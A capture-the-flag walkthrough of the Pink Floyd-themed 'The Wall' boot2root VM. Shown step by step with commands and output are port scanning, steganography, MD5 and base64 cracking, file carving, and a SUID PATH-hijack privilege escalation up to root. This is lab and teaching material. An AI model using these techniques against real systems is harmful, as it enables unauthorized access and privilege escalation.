In 1965, one of the most influential bands of our times was formed.. Pink Floyd. This boot2root box has been created to celebrate 50 years of Pink Floyd’s contribution to the music industry, with each challenge giving the attacker an introduction to each member of the Floyd.
You challenge is simple… set your controls for the heart of the sun, get root, and grab the flag! Rock on!
Xerubus asked if I would like to beta-test this VM prior to release and being a bit of a (closet) Pink Floyd fan, I jumped at the opportunity. So obviously the first stage in any boot2root is to port scan the sucker.
[email protected]:~$ nmap -n -sT 192.168.56.104 Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-12-02 19:52 GMT Stats: 0:01:25 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan Nmap scan report for 192.168.56.104 Host is up. All 1000 scanned ports on 192.168.56.104 are filtered
Straight up trolled already. I fired up Wireshark and after a minute or so, I saw a boat load of ARPs coming from The Wall - looking like an ARP scan.
If dug past the ARPs, and found a TCP packet destined for my IP on port 1337.
It looks like this is running on a cron, so I setup a netcat listener to catch the connection.
[email protected]:~$ nc -lnvp 1337 listening on [any] 1337 ... connect to [192.168.56.103] from (UNKNOWN) [192.168.56.104] 21840 .u!"` .x*"` ..+"NP .z"" ? M#` 9 , , 9 M d! ,8P' R X.:x' R' , F F' M R.d' d P @ E` , ss P ' P N.d' x '' ' X x . 9 .f ! . $b 4; $k / dH $f 'X ;$$ z . MR :$ R M$$, : d9b M' tM M: #'$L ;' M `8 X MR `$;t' $F # X ,oR t Q; $$@ R$ H :RP' $b X @' 9$E @Bd' $' ?X ; W `M' `$M d$ `E ;.o* :R .. ` ' "' ' @' '$o*"' The Wall by @xerubus -= Welcome to the Machine =- If you should go skating on the thin ice of modern life, dragging behind you the silent reproach of a million tear-stained eyes, don't be surprised when a crack in the ice appears under your feet. - Pink Floyd, The Thin Ice
Ok… brilliant, now what?
Well if you port scan the VM for a second time, it appears to have opened up a port.
[email protected]:~$ nmap -n -sT 192.168.56.104 PORT STATE SERVICE 80/tcp open http
There is nothing to see on the page, with the exception of this image.
In the HTML source, there is also the following:
If you want to find out what's behind these cold eyes, you'll just have to claw your way through this disguise. - Pink Floyd, The Wall Did you know? The Publius Enigma is a mystery surrounding the Division Bell album. Publius promised an unspecified reward for solving the riddle, and further claimed that there was an enigma hidden within the artwork. 737465673d3333313135373330646262623337306663626539373230666536333265633035
That string is totally hex, which we can decode like so:
>>> string = '737465673d3333313135373330646262623337306663626539373230666536333265633035' >>> string.decode('hex') 'steg=33115730dbbb370fcbe9720fe632ec05'
steg is a pretty solid clue, and probably relates to the image on the web page. This other string is MD5 and can be pretty easily cracked - turns out to be
So let’s download
pink_floyd.jpg and run it through some steg tools.
[email protected]:~/Downloads$ steghide extract -sf pink_floyd.jpg Enter passphrase: wrote extracted data to "pink_floyd_syd.txt". [email protected]:~/Downloads$ cat pink_floyd_syd.txt Hey Syd, I hear you're full of dust and guitars? If you want to See Emily Play, just use this key: U3lkQmFycmV0dA==|f831605ae34c2399d1e5bb3a4ab245d0 Roger Did you know? In 1965, The Pink Floyd Sound changed their name to Pink Floyd. The name was inspired by Pink Anderson and Floyd Council, two blues muscians on the Piedmont Blues record Syd Barret had in his collection.
So we have a new base64 and MD5 string.
[email protected]:~/Downloads$ echo -en 'U3lkQmFycmV0dA==' | base64 -d SydBarrett f831605ae34c2399d1e5bb3a4ab245d0 == pinkfloydrocks
So we have what looks like a set of credentials.
SydBarrett:pinkfloydrocks. But where to use them?
I was stuck here for a while, but if we do a ‘wider’ port scan, we find that port 1965 is open.
[email protected]:~$ nmap -n -sT -p- 192.168.56.104 PORT STATE SERVICE 80/tcp open http 1965/tcp open unknown [email protected]:~$ nc 192.168.56.104 1965 SSH-2.0-OpenSSH_7.0 Protocol mismatch.
SSH - so maybe we can SSH in as Syd.
[email protected]:~$ ssh [email protected] -p 1965 [email protected]'s password: Could not chdir to home directory /home/SydBarrett: No such file or directory This service allows sftp connections only. Connection to 192.168.56.104 closed.
Ok, SFTP it is. Let’s connect and see if we can find any interesting files.
[email protected]:~$ sftp -P 1965 [email protected] [email protected]'s password: Connected to 192.168.56.104. sftp> ls -la drwxr-xr-x 3 0 1000 512 Oct 24 18:17 .mail -rw-r--r-- 1 0 1000 1912 Oct 25 22:56 bio.txt -rw-r--r-- 1 0 1000 868967 Oct 24 16:17 syd_barrett_profile_pic.jpg sftp> ls -la .mail/ drwxr-xr-x 2 0 1000 512 Nov 11 10:25 .stash -rw-r--r-- 1 0 1000 309 Oct 24 18:18 sent-items sftp> ls -la .mail/.stash/ -rw-r--r-- 1 0 1000 48884479 Aug 7 14:33 eclipsed_by_the_moon sftp> get .mail/sent-items Fetching /.mail/sent-items to sent-items sftp> get .mail/.stash/eclipsed_by_the_moon Fetching /.mail/.stash/eclipsed_by_the_moon to eclipsed_by_the_moon
[email protected]:~$ cat sent-items Date: Sun, 24 Oct 1965 18:45:21 +0200 From: Syd Barrett <[email protected]> Reply-To: Syd Barret <[email protected]> To: Roger Waters <[email protected]> Subject: Had to hide the stash Roger... I had to hide the stash. Usual deal.. just use the scalpel when you find it. Ok, sorry for that. Rock on man "Syd"
scalpel is a clue here.
[email protected]:~$ file eclipsed_by_the_moon eclipsed_by_the_moon: gzip compressed data, last modified: Wed Nov 11 00:15:47 2015, from Unix
After we extract the content, we find it’s actually a disk image.
[email protected]:~$ file eclipsed_by_the_moon.lsd eclipsed_by_the_moon.lsd: DOS/MBR boot sector, code offset 0x3c+2, OEM-ID "MSDOS5.0", sectors/cluster 2, reserved sectors 8, root entries 512, Media descriptor 0xf8, sectors/FAT 188, sectors/track 63, heads 255, hidden sectors 2048, sectors 96256 (volumes > 32 MB) , serial number 0x9e322180, unlabeled, FAT (16 bit)
It won’t boot, so we go back to our scalpel clue. Scalpel is a tool for recovering deleted files - so lets see if we can recover anything. The first stage is to mod
/etc/scalpel/scalpel.conf and uncomment all the different types of files you want to look for.
[email protected]:~$ scalpel eclipsed_by_the_moon.lsd jpg with header "\xff\xd8\xff\xe0\x00\x10" and footer "\xff\xd9" --> 1 files Scalpel is done, files carved = 1, elapsed = 0 seconds.
A new directory is created,
scalpel-output, within which is a recovered image.
So now we have the password for RogerWaters,
hello_is_there_anybody_in_there. Let’s try and connect via SSH this time.
[email protected]:~$ ssh [email protected] -p 1965 [email protected]'s password: OpenBSD 5.8 (GENERIC) #1066: Sun Aug 16 02:33:00 MDT 2015 .u!"` .x*"` ..+"NP .z"" ? M#` 9 , , 9 M d! ,8P' R X.:x' R' , F F' M R.d' d P @ E` , ss P ' P N.d' x '' ' X x . 9 .f ! . $b 4; $k / dH $f 'X ;$$ z . MR :$ R M$$, : d9b M' tM M: #'$L ;' M `8 X MR `$;t' $F # X ,oR t Q; $$@ R$ H :RP' $b X @' 9$E @Bd' $' ?X ; W `M' `$M d$ `E ;.o* :R .. ` ' "' ' @' '$o*"' $
After some standard Linux enumeration, we get a list of all users on the system. It’s logical to assume that we will have to progress through each user before reaching root.
SydBarrett:*:1000:1000:Syd Barrett:/home/SydBarrett:/sbin/nologin NickMason:*:1001:1001:Nick Mason:/home/NickMason:/bin/ksh RogerWaters:*:1002:1002:Roger Waters:/home/RogerWaters:/bin/ksh RichardWright:*:1003:1003:Richard Wright:/home/RichardWright:/bin/ksh DavidGilmour:*:1004:1004:David Gilmour:/home/DavidGilmour:/bin/ksh
If we have a look for SUID and/or SGID files, we find two interesting binaries.
$ find / -perm -4000 -print 2> /dev/null /usr/local/bin/brick /usr/local/bin/shineon $ ls -l /usr/local/bin/brick -rws--s--x 1 NickMason NickMason 7291 Aug 8 00:33 /usr/local/bin/brick $ ls -l /usr/local/bin/shineon -rwsr-s--- 1 DavidGilmour RichardWright 7524 Oct 25 07:58 /usr/local/bin/shineon
We don’t have the privileges to execute
shineon yet, so let’s look at
$ /usr/local/bin/brick What have we here, laddie? Mysterious scribbings? A secret code? Oh, poems, no less! Poems everybody! Who is the only band member to be featured on every Pink Floyd album? : Nick Mason /bin/sh: Cannot determine current working directory $ id uid=1001(NickMason) gid=1001(NickMason) groups=1002(RogerWaters) $ whoami NickMason
In each home directory thus far, there has been a profile picture of the band member. Although Nick’s is something else in disguise.
$ file nick_mason_profile_pic.jpg nick_mason_profile_pic.jpg: Ogg data, Vorbis audio, stereo, 44100 Hz, created by: Xiph.Org libVorbis I
Listening to the track, you will notice some morse code. You can obviously decode it by ear, or load the spectrograph and do it visually.
The string we eventually come out with is
$ su RichardWright Password: ksh: Cannot determine current working directory $ id uid=1003(RichardWright) gid=1003(RichardWright) groups=1003(RichardWright)
Now we are Richard Wright, we can go back to the
shineon binary we found previously.
$ /usr/local/bin/shineon Menu 1. Calendar 2. Who 3. Check Internet 4. Check Mail 5. Exit
Trying out these functions, we can see that they are executing pre-defined shell commands. If we run
strings, we can see that all but one is called with an absolute path.
$ strings /usr/local/bin/shineon Menu 1. Calendar 2. Who 3. Check Internet 4. Check Mail 5. Exit Quitting program! Invalid choice! load_menu Time - The Dark Side of the Moon /usr/bin/cal Press ENTER to continue. Echoes - Meddle /usr/bin/who Is There Anybody Out There? - The Wall /sbin/ping -c 3 www.google.com Keep Talking- The Division Bell mail
$ cp /bin/ksh /tmp/mail $ export PATH=/tmp:$PATH $ /usr/local/bin/shineon Menu 1. Calendar 2. Who 3. Check Internet 4. Check Mail 5. Exit 4 Keep Talking- The Division Bell mail: Cannot determine current working directory $ id uid=1003(RichardWright) euid=1004(DavidGilmour) gid=1003(RichardWright) groups=1003(RichardWright)
In his home directory is a file called
$ cat anotherbrick.txt # Come on you raver, you seer of visions, come on you painter, you piper, you prisoner, and shine. - Pink Floyd, Shine On You Crazy Diamond New website for review: pinkfloyd1965newblogsite50yearscelebration-temp/index.php # You have to be trusted by the people you lie to. So that when they turn their backs on you, you'll get the chance to put the knife in. - Pink Floyd, Dogs
If we head over to this new directory, we get the following page:
As before, there is a clue in the HTML source.
Through the window in the wall, come streaming in on sunlight wings, a million bright ambassadors of morning. - Pink Floyd, Echoes Can you see what the Dog sees? Perhaps hints of lightness streaming in on sunlight wings?
homepageimg.jpg and have a close look around where the dog is sitting. You can just make out some black text.
To get a better look at this, I simply messed around with the brightness and contrast levels.
We can’t navigate to
\welcometothemachine in a browser.
403 Forbidden OpenBSD httpd
If we have a look on the actual VM.
$ ls -l /var/www/ drwxr-x--- 4 www welcometothemachine 512 Nov 27 01:47 htdocs $ ls -l /var/www/htdocs/ ls: /var/www/htdocs/: Permission denied
Even though we are part of the correct group our current privileges don’t reflect that, and on BSD apparently you can’t just run
$ cat /etc/group welcometothemachine:*:1005:DavidGilmour $ id uid=1003(RichardWright) euid=1004(DavidGilmour) gid=1003(RichardWright) groups=1003(RichardWright) $ newgrp welcometothemachine mail: newgrp: not found
So we have to find another way of inheriting DavidGilmour’s group privs. We can do just that with his password, that we find hidden in
$ strings david_gilmour_profile_pic.jpg who_are_you_and_who_am_i $ su DavidGilmour Password: $ id uid=1004(DavidGilmour) gid=1004(DavidGilmour) groups=1004(DavidGilmour), 1(daemon), 67(www), 1005(welcometothemachine)
Now we can get in the directory.
$ ls -l /var/www/htdocs/welcometothemachine/ total 16 -rws--s--- 1 root welcometothemachine 7513 Nov 27 01:47 PinkFloyd $ ./PinkFloyd Please send your answer to Old Pink, in care of the Funny Farm. - Pink Floyd, Empty Spaces Answer:
If we recall the other string in
50696e6b466c6f796435305965617273. This is more hex which we can decode.
>>> string = '50696e6b466c6f796435305965617273' >>> string.decode('hex') 'PinkFloyd50Years'
Maybe this is the correct answer?
$ ./PinkFloyd Please send your answer to Old Pink, in care of the Funny Farm. - Pink Floyd, Empty Spaces Answer: PinkFloyd50Years Denied.... If I had my way, I'd have all of ya shot. - Pink Floyd, In The Flesh
Nope, ok… After a while, I just shoved the raw hex in.
$ ./PinkFloyd Please send your answer to Old Pink, in care of the Funny Farm. - Pink Floyd, Empty Spaces Answer: 50696e6b466c6f796435305965617273 Fearlessly the idiot faced the crowd smiling. - Pink Floyd, Fearless Congratulations... permission has been granted. You can now set your controls to the heart of the sun!
permission granted is a little cryptic. It took me a while to realise it had given DavidGilmour sudo rights.
$ sudo -l Password: Matching Defaults entries for DavidGilmour on thewall: env_keep+="FTPMODE PKG_CACHE PKG_PATH SM_PATH SSH_AUTH_SOCK" User DavidGilmour may run the following commands on thewall: (ALL) SETENV: ALL
So now we can just elevate, no problem.
$ sudo -i # whoami root
Grab the flag.
# cat /root/flag.txt "The band is fantastic, that is really what I think. Oh, by the way, which one is Pink? - Pink Floyd, Have A Cigar" Congratulations on rooting thewall! ___________________________________________________________________ | | | | | | | | | | | |_|_______|_______|______ '__ ___|_______|_______|_______|_______|_| | | | | | ) / | | | | |_____|_______|_______|__ |,' , . | | _ , ___|_______|_______|_____| | | | | ,| | |\ | | ,' | | | | | |_|_______|_______|____ ' | _ | | \| |'\ _|_______|_______|_______|_| | | | | \ _' ' ` | \ | | | | |_____|_______|_______|_ ,-'_ _____ | _______|_______|_______|_____| | | | | ,-'| _ | | | | | | |_|_______|_______|__ ,-|-' | ,-. \ /_.--. _____|_______|_______|_| | | | | | | | V | ) | | | | |_____|_______|_______|_ | _ |-'`-' | | ,' _|_______|_______|_____| | | | | | | ' ;' | | | | |_|_______|_______|______"|_____ _,- o'__|_______|_______|_______|_| | | | | _,-' . | | | | |_____|_______|_______|_ _,--'\ _,-'_____|_______|_______|_____| | | | | ' ||_||-' _ | | | | | |_|_______|_______|_______|__ || ||,-' __|_______|_______|_______|_| | | | | | ||_,-' | | | | |_____|_______|______.|_______.__ ___|_______|_______|_______|_____| | | | | \ | / | | | | | |_|_______|_______|___ \ __|___ /, _ | | ______|_______|_______|_| | | | | \ // \ | | | | | | |_____|_______|_______|_ \ /\ //--'\ | | __|_______|_______|_____| | | | | ' V/ | |-' |__, | | | | |_|_______|_______|_______|_______ _______'_______|_______|_______|_| | | | | | | | | | | |_____|_______|_______|_______|_______|_______|_______|_______|_____| |_________|_______|_______|_______|_______|_______|_______|_______|_| Celebrating 50 years of Pink Floyd! Syd Barrett (RIP), Nick Mason, Roger Waters, Richard Wright (RIP), and David Gilmour. ** Shoutouts ** + @vulnhub for making it all possible + @rastamouse @thecolonial - "the test bunnies" -=========================================- - xerubus (@xerubus - www.mogozobo.com) - -=========================================-
It was also nice to read through the contents of
/root/scripts/ to see how the VM works.
Many thanks to xerubus, and thanks for letting me beta-test :)